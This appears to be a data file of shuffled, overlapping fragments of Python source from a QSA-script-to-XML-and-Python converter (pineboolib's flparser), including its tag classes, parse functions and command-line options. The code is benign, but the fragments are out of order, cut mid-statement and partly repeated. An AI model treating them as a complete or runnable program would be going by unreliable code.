"subelem.xml.iterchildren(): if self.set_child_argn: child.set(\"argn\", str(argn)) else: if 'argn' in child.attrib: del child.attrib['argn'] self.xml.append(child)",
"= os.path.join(options.storepath, bname + \".xml\") else: destname = filename + \".xml\" f1 =",
"[\"case_block\"] class CaseDefault(ListObject): tags = [\"case_default\"] class While(ListObject): tags = [\"whilestatement\"] class For(ListObject):",
"or os.path.getmtime(x) > os.path.getctime(x + \".xml\")] nfs = len(args) for nf, filename in",
"__init__(cls, name, bases, dct): global xml_class_types xml_class_types.append(cls) super(TagObjectFactory, cls).__init__(name, bases, dct) class TagObject(object,",
"debug_other = False tags = [\"instruction\"] class OpMath(TypedObject): debug_other = True tags =",
"tree_data = flscriptparse.calctree(prog, alias_mode=0) except Exception: print(\"Error al convertir a XML %r:\" %",
"description) result = True except FileNotFoundError: print(\"Fichero %r no encontrado\" % self.name) result",
"\"statement_list\", \"statement_block\"] adopt_childs_tags = ['source_element', 'statement_list', 'statement', \"statement_block\"] class Identifier(NamedObject): tags = [\"identifier\",",
"if isinstance(self.subelems[0], Constant): if self.subelems[0].xml.tag == \"base_expression\": self.subelems[0].xml.tag = \"Expression\" return self.subelems[0] else:",
"i += 1 return xmlelem.polish() def post_parse(treedata): source = parse(\"source\", treedata) # print",
"name = self.name[:self.name.find(\".\")] # fp, pathname, description = imp.find_module(self.name,[self.path]) self.module = imp.load_module(name, fp,",
"fn = parse_unknown else: fn = KNOWN_PARSERS[tagname] return fn(tagname, treedata) def getxmltagname(tagname): if",
"return fn return decorator def parse(tagname, treedata): global KNOWN_PARSERS, UNKNOWN_PARSERS if tagname not",
"import io if options.cache: args = [x for x in args if not",
".\") options.topython = False try: execute( options, [(arg + \".xml.py\").replace(\".qs.xml.py\", \".qs.py\") for arg",
"USEFUL_TOKENS: xmlelem.add_value(i, k, v) else: xmlelem.add_other(i, k, v) i += 1 return xmlelem.polish()",
"% name) elif options.topython: from .pytnyzer import pythonize import io if options.cache: args",
"print(traceback.format_exc()) sys.stdout = old_stderr text = stream.getvalue() if len(text) > 2: print(\"%s: \"",
"= value self.const_type = vtype self.xml.set(\"type\", vtype) self.xml.set(\"value\", value) class InlineUpdate(ListObject): tags =",
"\".py\").replace(\".qs.xml.py\", \".qs.py\"))] nfs = len(args) for nf, filename in enumerate(args): bname = os.path.basename(filename)",
"[\"funccall_1\"] class CallArguments(ListObject): tags = [\"callargs\"] class Constant(ListObject): tags = [\"constant\"] def add_value(self,",
"[\"ternary_operator\"] class OpUpdate(TypedObject): tags = [\"updateoperator\"] # ----- keep this one at the",
"return tagname in self.tags def __init__(self, tagname): self.astname = tagname self.xml = etree.Element(self.tagname(tagname))",
"in subelem.xml.iterchildren(): if self.set_child_argn: child.set(\"argn\", str(argn)) else: if 'argn' in child.attrib: del child.attrib['argn']",
"0 for k, v in treedata['content']: if type(v) is dict: instruction = parse(k,",
"if vtype == \"ID\" and self.name_is_first_id and self.xmlname is None: self.xmlname = value",
"class TagObject(object, metaclass=TagObjectFactory): tags = [] set_child_argn = False name_is_first_id = False debug_other",
"elif options.exec_python: # import qsatype for filename in args: realpath = os.path.realpath(filename) path,",
"options.verbose: sys.stdout.flush() try: filecontent = open(filename, \"r\", encoding=\"latin-1\").read() filecontent = flscriptparse.cleanNoPython(filecontent) except Exception",
"isinstance(self.subelems[0], Constant): if self.subelems[0].xml.tag == \"base_expression\": self.subelems[0].xml.tag = \"Expression\" return self.subelems[0] else: self.xml.tag",
"pudo abrir %-35s \\n\" % (repr(filename))) continue if prog[\"error_count\"] > 0: print(\"Encontramos %d",
"['dictobject_value_elemlist', \"dictobject_value\"] class DictElem(ListObject): tags = [\"dictobject_value_elem\"] class ExpressionContainer(ListObject): tags = [\"expression\"] #",
"= [] self.values = [] if self.name_is_first_id: self.xml.set(\"name\", \"\") def adopt_children(self, argn, subelem):",
"KNOWN_PARSERS[n] = fn return fn return decorator def parse(tagname, treedata): global KNOWN_PARSERS, UNKNOWN_PARSERS",
"= [\"case_block_list\"] adopt_childs_tags = ['case_cblock_list', 'case_block_list'] class Case(ListObject): tags = [\"case_block\"] class CaseDefault(ListObject):",
"tagname): return True # ----------------- def create_xml(tagname): classobj = None for cls in",
"argn, subelem): for child in subelem.xml.iterchildren(): if self.set_child_argn: child.set(\"argn\", str(argn)) else: if 'argn'",
"True tags = [\"mathoperator\"] class Compare(TypedObject): debug_other = True tags = [\"cmp_symbol\", \"boolcmp_symbol\"]",
"alias_mode=0) except Exception: print(\"Error al convertir a XML %r:\" % bname) print(\"\\n\".join(traceback.format_exc().splitlines()[-7:])) if",
"tags = [\"funcdeclaration\"] callback_subelem = ListNamedObject.callback_subelem.copy() callback_subelem[VariableType] = \"add_vartype\" def add_vartype(self, argn, subelem):",
"k, v) i += 1 return xmlelem.polish() def post_parse(treedata): source = parse(\"source\", treedata)",
"%-35s \\n\" % (repr(filename))) continue if prog[\"error_count\"] > 0: print(\"Encontramos %d errores parseando:",
"from lxml import etree try: from pineboolib.flparser import flscriptparse except ImportError: import flscriptparse",
"self.xml.set(\"mode\", vtype) def polish(self): # if len(self.values) == 0 and len(self.subelems) == 1:",
"self.xml.set(\"name\", value) return self.xml.set(\"arg%02d\" % argn, vtype + \":\" + repr(value)) def add_other(self,",
"False tags = [\"instruction\"] class OpMath(TypedObject): debug_other = True tags = [\"mathoperator\"] class",
"xmlelem.polish() def post_parse(treedata): source = parse(\"source\", treedata) # print UNKNOWN_PARSERS.keys() return source.xml class",
"= True except FileNotFoundError: print(\"Fichero %r no encontrado\" % self.name) result = False",
"[\"callargs\"] class Constant(ListObject): tags = [\"constant\"] def add_value(self, argn, vtype, value): value =",
"return self class Class(ListNamedObject): tags = [\"classdeclaration\"] callback_subelem = ListNamedObject.callback_subelem.copy() callback_subelem[ExtendsType] = \"add_exttype\"",
"'case_block_list'] class CaseList(ListObject): tags = [\"case_block_list\"] adopt_childs_tags = ['case_cblock_list', 'case_block_list'] class Case(ListObject): tags",
"return classobj(tagname) def parse_unknown(tagname, treedata): xmlelem = create_xml(tagname) i = 0 for k,",
"help=\"write xml file from qs\") parser.add_option(\"--full\", action=\"store_true\", dest=\"full\", default=False, help=\"write xml file from",
"x in args if not os.path.exists(x + \".xml\") or os.path.getmtime(x) > os.path.getctime(x +",
"= [\"classdeclaration\"] callback_subelem = ListNamedObject.callback_subelem.copy() callback_subelem[ExtendsType] = \"add_exttype\" def add_exttype(self, argn, subelem): self.xml.set(\"extends\",",
"return listobj[self.__class__] if self.astname in listobj: return listobj[self.astname] return default def add_subelem(self, argn,",
"if fp: fp.close() return result def parseArgs(argv): parser = OptionParser() parser.add_option(\"-q\", \"--quiet\", action=\"store_false\",",
"vtype) class Source(ListObject): tags = [\"source\", \"basicsource\", \"classdeclarationsource\", \"statement_list\", \"statement_block\"] adopt_childs_tags = ['source_element',",
"etree.Element(self.tagname(tagname)) self.xmlname = None self.subelems = [] self.values = [] if self.name_is_first_id: self.xml.set(\"name\",",
"if len(self.values) == 0 and len(self.subelems) == 1: return self.subelems[0] return self class",
"New(ListObject): tags = [\"new_operator\"] class Delete(ListObject): tags = [\"deleteinstruction\"] class Parentheses(ListObject): tags =",
"== \"RCONST\": vtype = \"Regex\" if vtype == \"ICONST\": vtype = \"Number\" if",
"and self.xmlname is None: self.xmlname = value self.xml.set(\"name\", value) return self.xml.set(\"arg%02d\" % argn,",
"= None try: description = ('.py', 'U', imp.PY_SOURCE) # description = ('.pyc', 'U',",
"def add_vartype(self, argn, subelem): self.xml.set(\"type\", str(subelem.xmlname)) class DeclarationBlock(ListObject): tags = [\"vardeclaration\"] adopt_childs_tags =",
"adopt_childs_tags = [] omit_tags = ['empty'] callback_subelem = {} promote_child_if_alone = False @classmethod",
"callback)(argn, subelem) if self.set_child_argn: subelem.xml.set(\"argn\", str(argn)) self.xml.append(subelem.xml) self.subelems.append(subelem) def add_value(self, argn, vtype, value):",
"['vardecl_list'] def add_other(self, argn, vtype, value): if argn == 0: self.xml.set(\"mode\", vtype) def",
"vtype = \"Regex\" if vtype == \"ICONST\": vtype = \"Number\" if vtype ==",
"InstructionUpdate(ListObject): tags = [\"updateinstruction\"] class Switch(ListObject): tags = [\"switch\"] adopt_childs_tags = ['case_cblock_list', 'case_block_list']",
"= open(filename, \"r\", encoding=\"latin-1\").read() filecontent = flscriptparse.cleanNoPython(filecontent) except Exception as e: print(\"Error: No",
"\"statement_block\"] adopt_childs_tags = ['source_element', 'statement_list', 'statement', \"statement_block\"] class Identifier(NamedObject): tags = [\"identifier\", \"optid\"]",
"= [\"condition\"] class Else(ListObject): tags = [\"optelse\"] def polish(self): if len(self.subelems) == 0:",
"= \"String\" value = value[1:-1] self.xml.set(\"delim\", \"'\") if vtype == \"RCONST\": vtype =",
"print(\"Done.\") elif options.exec_python: # import qsatype for filename in args: realpath = os.path.realpath(filename)",
"parse_for(*tagnames): global KNOWN_PARSERS def decorator(fn): for n in tagnames: KNOWN_PARSERS[n] = fn return",
"def polish(self): if self.promote_child_if_alone: if len(self.values) == 0 and len(self.subelems) == 1: return",
"tagname in self.tags def __init__(self, tagname): self.astname = tagname self.xml = etree.Element(self.tagname(tagname)) self.xmlname",
"= [\"identifier\", \"optid\"] def polish(self): if self.xmlname is None: self.astname = \"empty\" return",
"if prog[\"error_count\"] > 0: print(\"Encontramos %d errores parseando: %-35s \\n\" % (prog[\"error_count\"], repr(filename)))",
"= flscriptparse.parse(filecontent) sys.stdout.write(\"\\r\") if not prog: print(\"Error: No se pudo abrir %-35s \\n\"",
"if argn == 0: self.xml.set(\"mode\", \"update-read\") if argn == 1: self.xml.set(\"mode\", \"read-update\") class",
"= imp.find_module(self.name,[self.path]) self.module = imp.load_module(name, fp, pathname, description) result = True except FileNotFoundError:",
"\"dictobject_value\"] class DictElem(ListObject): tags = [\"dictobject_value_elem\"] class ExpressionContainer(ListObject): tags = [\"expression\"] # adopt_childs_tags",
"v) else: xmlelem.add_other(i, k, v) i += 1 return xmlelem.polish() def post_parse(treedata): source",
"Variable(NamedObject): tags = [\"vardecl\"] callback_subelem = NamedObject.callback_subelem.copy() callback_subelem[VariableType] = \"add_vartype\" def add_vartype(self, argn,",
"tags = [\"new_operator\"] class Delete(ListObject): tags = [\"deleteinstruction\"] class Parentheses(ListObject): tags = [\"parentheses\"]",
"sys.stdout.write( \"Parsing File: %-35s . . . . (%.1f%%) \" % (bname, 100.0",
"= ['varmemcall', \"member_var\", \"member_call\"] class ArrayMember(TagObject): debug_other = False set_child_argn = False tags",
"help=\"don't print status messages to stdout\") parser.add_option(\"--optdebug\", action=\"store_true\", dest=\"optdebug\", default=False, help=\"debug optparse module\")",
"OptionParser import os import os.path import sys import imp import traceback from lxml",
"= [\"withstatement\"] class TryCatch(ListObject): tags = [\"trycatch\"] class New(ListObject): tags = [\"new_operator\"] class",
"except Exception as e: print(\"Error: No se pudo abrir fichero %-35s \\n\" %",
"options, [(arg + \".xml.py\").replace(\".qs.xml.py\", \".qs.py\") for arg in args]) except Exception: print(\"Error al",
"parse(tagname, treedata): global KNOWN_PARSERS, UNKNOWN_PARSERS if tagname not in KNOWN_PARSERS: UNKNOWN_PARSERS[tagname] = 1",
"__init__(self, tagname): self.astname = tagname self.xml = etree.Element(self.tagname(tagname)) self.xmlname = None self.subelems =",
"self.astname = \"empty\" return self class Function(ListNamedObject): tags = [\"funcdeclaration\"] callback_subelem = ListNamedObject.callback_subelem.copy()",
"listobj[self.astname] return default def add_subelem(self, argn, subelem): if subelem.is_in(self.omit_tags): return self.omit_subelem(argn, subelem) if",
"\".xml\" for arg in args]) except Exception: print(\"Error convirtiendo:\") print(traceback.format_exc()) if execpython: options.exec_python",
"repr(value)) def add_other(self, argn, vtype, data): if self.debug_other: self.xml.set(\"arg%02d\" % argn, vtype) def",
"execute( options, [(arg + \".xml.py\").replace(\".qs.xml.py\", \".qs.py\") for arg in args]) except Exception: print(\"Error",
"# import qsatype for filename in args: realpath = os.path.realpath(filename) path, name =",
"self.astname in listobj: return listobj[self.astname] return default def add_subelem(self, argn, subelem): if subelem.is_in(self.omit_tags):",
"str(subelem.xmlname)) class Member(TagObject): debug_other = False set_child_argn = False tags = [\"member_var\", \"member_call\"]",
"% tagname xml_class_types = [] class TagObjectFactory(type): def __init__(cls, name, bases, dct): global",
"class ForIn(ListObject): tags = [\"forinstatement\"] class With(ListObject): tags = [\"withstatement\"] class TryCatch(ListObject): tags",
"> 0: print(\"Encontramos %d errores parseando: %-35s \\n\" % (prog[\"error_count\"], repr(filename))) continue if",
"if tagname not in KNOWN_PARSERS: UNKNOWN_PARSERS[tagname] = 1 fn = parse_unknown else: fn",
"adopt_childs_tags = ['source_element', 'statement_list', 'statement', \"statement_block\"] class Identifier(NamedObject): tags = [\"identifier\", \"optid\"] def",
"options.exec_python = execpython if options.verbose: print(\"Pass 3 - Test PY file load .",
"= filename + \".xml\" f1 = open(destname, \"wb\") f1.write(etree.tostring(ast, pretty_print=True)) f1.close() if __name__",
"class FunctionAnon(ListObject): tags = [\"funcdeclaration_anon\"] class FunctionAnonExec(ListObject): tags = [\"funcdeclaration_anon_exec\"] class Variable(NamedObject): tags",
". . . . (%.1f%%) \" % (bname, 100.0 * (nf + 1.0)",
"action=\"store_true\", dest=\"optdebug\", default=False, help=\"debug optparse module\") parser.add_option(\"--debug\", action=\"store_true\", dest=\"debug\", default=False, help=\"prints lots of",
"in tagnames: KNOWN_PARSERS[n] = fn return fn return decorator def parse(tagname, treedata): global",
"nfs)) if options.verbose: sys.stdout.flush() old_stderr = sys.stdout stream = io.StringIO() sys.stdout = stream",
"create_xml(tagname): classobj = None for cls in xml_class_types: if cls.can_process_tag(tagname): classobj = cls",
"dest=\"topython\", default=False, help=\"write python file from xml\") parser.add_option(\"--exec-py\", action=\"store_true\", dest=\"exec_python\", default=False, help=\"try to",
"None: self.xmlname = value self.xml.set(\"name\", value) return self.xml.set(\"arg%02d\" % argn, vtype + \":\"",
"os.path.exists((x + \".py\").replace(\".qs.xml.py\", \".qs.py\")) or os.path.getmtime(x) > os.path.getctime((x + \".py\").replace(\".qs.xml.py\", \".qs.py\"))] nfs =",
"PY_COMPILED) pathname = os.path.join(self.path, self.name) fp = open(pathname) name = self.name[:self.name.find(\".\")] # fp,",
"vtype = \"String\" value = value[1:-1] self.xml.set(\"delim\", \"'\") if vtype == \"RCONST\": vtype",
"= [\"flowinstruction\"] class Instruction(TagObject): promote_child_if_alone = True debug_other = False tags = [\"instruction\"]",
"self.name) fp = open(pathname) name = self.name[:self.name.find(\".\")] # fp, pathname, description = imp.find_module(self.name,[self.path])",
"ListNamedObject.callback_subelem.copy() callback_subelem[VariableType] = \"add_vartype\" def add_vartype(self, argn, subelem): self.xml.set(\"returns\", str(subelem.xmlname)) class FunctionAnon(ListObject): tags",
"def parseArgs(argv): parser = OptionParser() parser.add_option(\"-q\", \"--quiet\", action=\"store_false\", dest=\"verbose\", default=True, help=\"don't print status",
"print(\"Fichero no existe: %s\" % name) continue mod = Module(name, path) if not",
"def polish(self): if len(self.subelems) == 0: self.astname = \"empty\" return self class DictObject(ListObject):",
"= [\"trycatch\"] class New(ListObject): tags = [\"new_operator\"] class Delete(ListObject): tags = [\"deleteinstruction\"] class",
"else: fn = KNOWN_PARSERS[tagname] return fn(tagname, treedata) def getxmltagname(tagname): if tagname == \"source\":",
"\"classdeclarationsource\", \"statement_list\", \"statement_block\"] adopt_childs_tags = ['source_element', 'statement_list', 'statement', \"statement_block\"] class Identifier(NamedObject): tags =",
"= os.path.basename(filename) if options.storepath: destname = os.path.join(options.storepath, bname + \".py\") else: destname =",
"os.path.exists(realpath): print(\"Fichero no existe: %s\" % name) continue mod = Module(name, path) if",
"if subelem.is_in(self.omit_tags): return self.omit_subelem(argn, subelem) if subelem.is_in(self.adopt_childs_tags): return self.adopt_children(argn, subelem) callback = subelem.get(self.callback_subelem)",
"For(ListObject): tags = [\"forstatement\"] class ForInitialize(ListObject): tags = [\"for_initialize\"] class ForCompare(ListObject): tags =",
"OpMath(TypedObject): debug_other = True tags = [\"mathoperator\"] class Compare(TypedObject): debug_other = True tags",
"subelem.xml.set(\"argn\", str(argn)) self.xml.append(subelem.xml) self.subelems.append(subelem) def add_value(self, argn, vtype, value): self.values.append((vtype, value)) if vtype",
"= [\"callinstruction\"] class InstructionStore(TagObject): promote_child_if_alone = True debug_other = False tags = [\"storeinstruction\"]",
"data): if self.debug_other: self.xml.set(\"arg%02d\" % argn, vtype) def polish(self): if self.promote_child_if_alone: if len(self.values)",
"child in subelem.xml.iterchildren(): if self.set_child_argn: child.set(\"argn\", str(argn)) else: if 'argn' in child.attrib: del",
"default=False, help=\"write python file from xml\") parser.add_option(\"--exec-py\", action=\"store_true\", dest=\"exec_python\", default=False, help=\"try to execute",
"= False name_is_first_id = False debug_other = True adopt_childs_tags = [] omit_tags =",
"xmlelem = create_xml(tagname) i = 0 for k, v in treedata['content']: if type(v)",
"True debug_other = False tags = [\"instruction\"] class OpMath(TypedObject): debug_other = True tags",
"= value[1:-1] self.xml.set(\"delim\", '\"') if vtype == \"CCONST\": vtype = \"String\" value =",
"return self.xml.set(\"arg%02d\" % argn, vtype + \":\" + repr(value)) def add_other(self, argn, vtype,",
"argn, vtype) def polish(self): if self.promote_child_if_alone: if len(self.values) == 0 and len(self.subelems) ==",
"return \"Source\" if tagname == \"funcdeclaration\": return \"Function\" if tagname == \"classdeclaration\": return",
"\".debug\") except Exception: print(\"Error al pythonificar %r:\" % filename) print(traceback.format_exc()) sys.stdout = old_stderr",
"'U', imp.PY_SOURCE) # description = ('.pyc', 'U', PY_COMPILED) pathname = os.path.join(self.path, self.name) fp",
"(options, args) = parser.parse_args(argv) return (options, args) def main(): options, args = parseArgs(sys.argv[1:])",
"cls.can_process_tag(tagname): classobj = cls break if classobj is None: return None return classobj(tagname)",
"None: return None return classobj(tagname) def parse_unknown(tagname, treedata): xmlelem = create_xml(tagname) i =",
"se quiere guardar resultado, no hace falta calcular mas continue tree_data = None",
"Instruction(TagObject): promote_child_if_alone = True debug_other = False tags = [\"instruction\"] class OpMath(TypedObject): debug_other",
"callback_subelem = NamedObject.callback_subelem.copy() callback_subelem[VariableType] = \"add_vartype\" def add_vartype(self, argn, subelem): self.xml.set(\"type\", str(subelem.xmlname)) class",
"subelem) if subelem.is_in(self.adopt_childs_tags): return self.adopt_children(argn, subelem) callback = subelem.get(self.callback_subelem) if callback: return getattr(self,",
"action=\"store_true\", dest=\"topython\", default=False, help=\"write python file from xml\") parser.add_option(\"--exec-py\", action=\"store_true\", dest=\"exec_python\", default=False, help=\"try",
"== \"ICONST\": vtype = \"Number\" if vtype == \"FCONST\": vtype = \"Number\" self.const_value",
"ListNamedObject.callback_subelem.copy() callback_subelem[ExtendsType] = \"add_exttype\" def add_exttype(self, argn, subelem): self.xml.set(\"extends\", str(subelem.xmlname)) class Member(TagObject): debug_other",
"\"vardeclaration\": return \"Variable\" return \"Unknown.%s\" % tagname xml_class_types = [] class TagObjectFactory(type): def",
"[\"vardecl\"] callback_subelem = NamedObject.callback_subelem.copy() callback_subelem[VariableType] = \"add_vartype\" def add_vartype(self, argn, subelem): self.xml.set(\"type\", str(subelem.xmlname))",
"the end. class Unknown(TagObject): promote_child_if_alone = True set_child_argn = False @classmethod def tagname(self,",
"status messages to stdout\") parser.add_option(\"--optdebug\", action=\"store_true\", dest=\"optdebug\", default=False, help=\"debug optparse module\") parser.add_option(\"--debug\", action=\"store_true\",",
"= \"add_exttype\" def add_exttype(self, argn, subelem): self.xml.set(\"extends\", str(subelem.xmlname)) class Member(TagObject): debug_other = False",
"return (options, args) def main(): options, args = parseArgs(sys.argv[1:]) execute(options, args) def pythonify(filelist):",
"= io.StringIO() sys.stdout = stream try: pythonize(filename, destname, destname + \".debug\") except Exception:",
"child.attrib: del child.attrib['argn'] self.xml.append(child) def omit_subelem(self, argn, subelem): return def is_in(self, listobj): return",
"treedata) def getxmltagname(tagname): if tagname == \"source\": return \"Source\" if tagname == \"funcdeclaration\":",
"% bname) print(\"\\n\".join(traceback.format_exc().splitlines()[-7:])) if not tree_data: print(\"No se pudo parsear %-35s \\n\" %",
"existe: %s\" % name) continue mod = Module(name, path) if not mod.loadModule(): print(\"Error",
"= False class TypedObject(ListObject): type_arg = 0 def add_other(self, argn, vtype, value): if",
"[\"constant\"] def add_value(self, argn, vtype, value): value = str(value) # str(value,\"ISO-8859-15\",\"replace\") if vtype",
"def tagname(self, tagname): return self.__name__ @classmethod def can_process_tag(self, tagname): return tagname in self.tags",
"imp.load_module(name, fp, pathname, description) result = True except FileNotFoundError: print(\"Fichero %r no encontrado\"",
"(bname, 100.0 * (nf + 1.0) / nfs)) if options.verbose: sys.stdout.flush() try: filecontent",
"fn return fn return decorator def parse(tagname, treedata): global KNOWN_PARSERS, UNKNOWN_PARSERS if tagname",
"@classmethod def can_process_tag(self, tagname): return True # ----------------- def create_xml(tagname): classobj = None",
"print(\"Pass 2 - Pythonize and write PY file . . .\") try: execute(options,",
"= [\"forinstatement\"] class With(ListObject): tags = [\"withstatement\"] class TryCatch(ListObject): tags = [\"trycatch\"] class",
"classobj(tagname) def parse_unknown(tagname, treedata): xmlelem = create_xml(tagname) i = 0 for k, v",
"tags = [\"member_var\", \"member_call\"] adopt_childs_tags = ['varmemcall', \"member_var\", \"member_call\"] class ArrayMember(TagObject): debug_other =",
"True if options.verbose: print(\"Pass 1 - Parse and write XML file . .",
"if options.verbose: print(\"Pass 2 - Pythonize and write PY file . . .\")",
"Case(ListObject): tags = [\"case_block\"] class CaseDefault(ListObject): tags = [\"case_default\"] class While(ListObject): tags =",
"self.name[:self.name.find(\".\")] # fp, pathname, description = imp.find_module(self.name,[self.path]) self.module = imp.load_module(name, fp, pathname, description)",
"/ nfs)) if options.verbose: sys.stdout.flush() try: filecontent = open(filename, \"r\", encoding=\"latin-1\").read() filecontent =",
"name, path): self.name = name self.path = path def loadModule(self): fp = None",
"CaseDefault(ListObject): tags = [\"case_default\"] class While(ListObject): tags = [\"whilestatement\"] class For(ListObject): tags =",
"= ('.py', 'U', imp.PY_SOURCE) # description = ('.pyc', 'U', PY_COMPILED) pathname = os.path.join(self.path,",
"file from xml\") parser.add_option(\"--exec-py\", action=\"store_true\", dest=\"exec_python\", default=False, help=\"try to execute python file\") parser.add_option(\"--toxml\",",
"print(\"Encontramos %d errores parseando: %-35s \\n\" % (prog[\"error_count\"], repr(filename))) continue if not options.toxml:",
"= name self.path = path def loadModule(self): fp = None try: description =",
"None: self.astname = \"empty\" return self class ExtendsType(NamedObject): tags = [\"optextends\"] def polish(self):",
"\".xml\") or os.path.getmtime(x) > os.path.getctime(x + \".xml\")] nfs = len(args) for nf, filename",
"return \"Class\" if tagname == \"vardeclaration\": return \"Variable\" return \"Unknown.%s\" % tagname xml_class_types",
"callback_subelem = {} promote_child_if_alone = False @classmethod def tagname(self, tagname): return self.__name__ @classmethod",
"False debug_other = False class NamedObject(TagObject): name_is_first_id = True debug_other = False class",
"class OpUnary(TypedObject): tags = [\"unary_operator\"] class OpTernary(ListObject): tags = [\"ternary_operator\"] class OpUpdate(TypedObject): tags",
"as e: print(traceback.format_exc()) result = False if fp: fp.close() return result def parseArgs(argv):",
"= imp.load_module(name, fp, pathname, description) result = True except FileNotFoundError: print(\"Fichero %r no",
"\"add_vartype\" def add_vartype(self, argn, subelem): self.xml.set(\"type\", str(subelem.xmlname)) class DeclarationBlock(ListObject): tags = [\"vardeclaration\"] adopt_childs_tags",
"False name_is_first_id = False debug_other = True adopt_childs_tags = [] omit_tags = ['empty']",
"continue if not options.toxml: # Si no se quiere guardar resultado, no hace",
"InstructionStore(TagObject): promote_child_if_alone = True debug_other = False tags = [\"storeinstruction\"] class InstructionFlow(TypedObject): debug_other",
"def adopt_children(self, argn, subelem): for child in subelem.xml.iterchildren(): if self.set_child_argn: child.set(\"argn\", str(argn)) else:",
"bname + \".py\") else: destname = filename + \".py\" destname = destname.replace(\".qs.xml.py\", \".qs.py\")",
"> 2: print(\"%s: \" % bname + (\"\\n%s: \" % bname).join(text.splitlines())) else: if",
"for arg in args]) except Exception: print(\"Error convirtiendo:\") print(traceback.format_exc()) if execpython: options.exec_python =",
"OpTernary(ListObject): tags = [\"ternary_operator\"] class OpUpdate(TypedObject): tags = [\"updateoperator\"] # ----- keep this",
"of useless messages\") parser.add_option(\"--path\", dest=\"storepath\", default=None, help=\"store XML results in PATH\") parser.add_option(\"--topython\", action=\"store_true\",",
"\"member_call\"] class ArrayMember(TagObject): debug_other = False set_child_argn = False tags = [\"array_member\"] adopt_childs_tags",
"\"empty\" return self class DictObject(ListObject): tags = [\"dictobject_value_elemlist\", \"dictobject_value\"] adopt_childs_tags = ['dictobject_value_elemlist', \"dictobject_value\"]",
"def polish(self): if self.xmlname is None: self.astname = \"empty\" return self class Arguments(ListObject):",
"k, v) else: xmlelem.add_other(i, k, v) i += 1 return xmlelem.polish() def post_parse(treedata):",
"if tagname == \"source\": return \"Source\" if tagname == \"funcdeclaration\": return \"Function\" if",
"value = value[1:-1] self.xml.set(\"delim\", \"'\") if vtype == \"RCONST\": vtype = \"Regex\" if",
"treedata['content']: if type(v) is dict: instruction = parse(k, v) xmlelem.add_subelem(i, instruction) elif k",
"debug_other = False tags = [\"callinstruction\"] class InstructionStore(TagObject): promote_child_if_alone = True debug_other =",
"@classmethod def tagname(self, tagname): return self.__name__ @classmethod def can_process_tag(self, tagname): return tagname in",
"builtins import str from builtins import object from optparse import OptionParser import os",
"return self.subelems[0] return self class Class(ListNamedObject): tags = [\"classdeclaration\"] callback_subelem = ListNamedObject.callback_subelem.copy() callback_subelem[ExtendsType]",
"ast is None: print(\"No se pudo analizar %-35s \\n\" % (repr(filename))) continue if",
"and write PY file . . .\") try: execute(options, [arg + \".xml\" for",
"if 'argn' in child.attrib: del child.attrib['argn'] self.xml.append(child) def omit_subelem(self, argn, subelem): return def",
"if not os.path.exists(x + \".xml\") or os.path.getmtime(x) > os.path.getctime(x + \".xml\")] nfs =",
"+ \".py\") else: destname = filename + \".py\" destname = destname.replace(\".qs.xml.py\", \".qs.py\") if",
"path): self.name = name self.path = path def loadModule(self): fp = None try:",
"if options.verbose: sys.stdout.flush() old_stderr = sys.stdout stream = io.StringIO() sys.stdout = stream try:",
"self.xmlname = value self.xml.set(\"name\", value) return self.xml.set(\"arg%02d\" % argn, vtype + \":\" +",
"stream = io.StringIO() sys.stdout = stream try: pythonize(filename, destname, destname + \".debug\") except",
"0 and len(self.subelems) == 1: return self.subelems[0] return self class ListObject(TagObject): set_child_argn =",
"+ \".xml.py\").replace(\".qs.xml.py\", \".qs.py\") for arg in args]) except Exception: print(\"Error al ejecutar Python:\")",
"3 - Test PY file load . . .\") options.topython = False try:",
"can_process_tag(self, tagname): return True # ----------------- def create_xml(tagname): classobj = None for cls",
"os.path.getmtime(x) > os.path.getctime(x + \".xml\")] nfs = len(args) for nf, filename in enumerate(args):",
"self.xml = etree.Element(self.tagname(tagname)) self.xmlname = None self.subelems = [] self.values = [] if",
"argn, vtype + \":\" + repr(value)) def add_other(self, argn, vtype, data): if self.debug_other:",
"tags = [\"source\", \"basicsource\", \"classdeclarationsource\", \"statement_list\", \"statement_block\"] adopt_childs_tags = ['source_element', 'statement_list', 'statement', \"statement_block\"]",
"default=True, help=\"don't print status messages to stdout\") parser.add_option(\"--optdebug\", action=\"store_true\", dest=\"optdebug\", default=False, help=\"debug optparse",
"omit_tags = ['empty'] callback_subelem = {} promote_child_if_alone = False @classmethod def tagname(self, tagname):",
"tags = [\"withstatement\"] class TryCatch(ListObject): tags = [\"trycatch\"] class New(ListObject): tags = [\"new_operator\"]",
"tagname not in KNOWN_PARSERS: UNKNOWN_PARSERS[tagname] = 1 fn = parse_unknown else: fn =",
"FunctionAnon(ListObject): tags = [\"funcdeclaration_anon\"] class FunctionAnonExec(ListObject): tags = [\"funcdeclaration_anon_exec\"] class Variable(NamedObject): tags =",
"PY file load . . .\") options.topython = False try: execute( options, [(arg",
"help=\"try to execute python file\") parser.add_option(\"--toxml\", action=\"store_true\", dest=\"toxml\", default=False, help=\"write xml file from",
"class Switch(ListObject): tags = [\"switch\"] adopt_childs_tags = ['case_cblock_list', 'case_block_list'] class CaseList(ListObject): tags =",
"default=False, help=\"write xml file from qs\") parser.add_option(\"--full\", action=\"store_true\", dest=\"full\", default=False, help=\"write xml file",
"xml file from qs\") parser.add_option(\"--cache\", action=\"store_true\", dest=\"cache\", default=False, help=\"If dest file exists, don't",
"module\") parser.add_option(\"--debug\", action=\"store_true\", dest=\"debug\", default=False, help=\"prints lots of useless messages\") parser.add_option(\"--path\", dest=\"storepath\", default=None,",
"adopt_childs_tags = ['case_cblock_list', 'case_block_list'] class Case(ListObject): tags = [\"case_block\"] class CaseDefault(ListObject): tags =",
"self.name_is_first_id and self.xmlname is None: self.xmlname = value self.xml.set(\"name\", value) return self.xml.set(\"arg%02d\" %",
"OpUpdate(TypedObject): tags = [\"updateoperator\"] # ----- keep this one at the end. class",
"Exception as e: print(\"Error: No se pudo abrir fichero %-35s \\n\" % (repr(filename)),",
"% (repr(filename))) continue if prog[\"error_count\"] > 0: print(\"Encontramos %d errores parseando: %-35s \\n\"",
"fn = KNOWN_PARSERS[tagname] return fn(tagname, treedata) def getxmltagname(tagname): if tagname == \"source\": return",
"xmlelem.add_subelem(i, instruction) elif k in USEFUL_TOKENS: xmlelem.add_value(i, k, v) else: xmlelem.add_other(i, k, v)",
"self.xml.set(\"type\", vtype) class Source(ListObject): tags = [\"source\", \"basicsource\", \"classdeclarationsource\", \"statement_list\", \"statement_block\"] adopt_childs_tags =",
"options.topython = True if options.verbose: print(\"Pass 2 - Pythonize and write PY file",
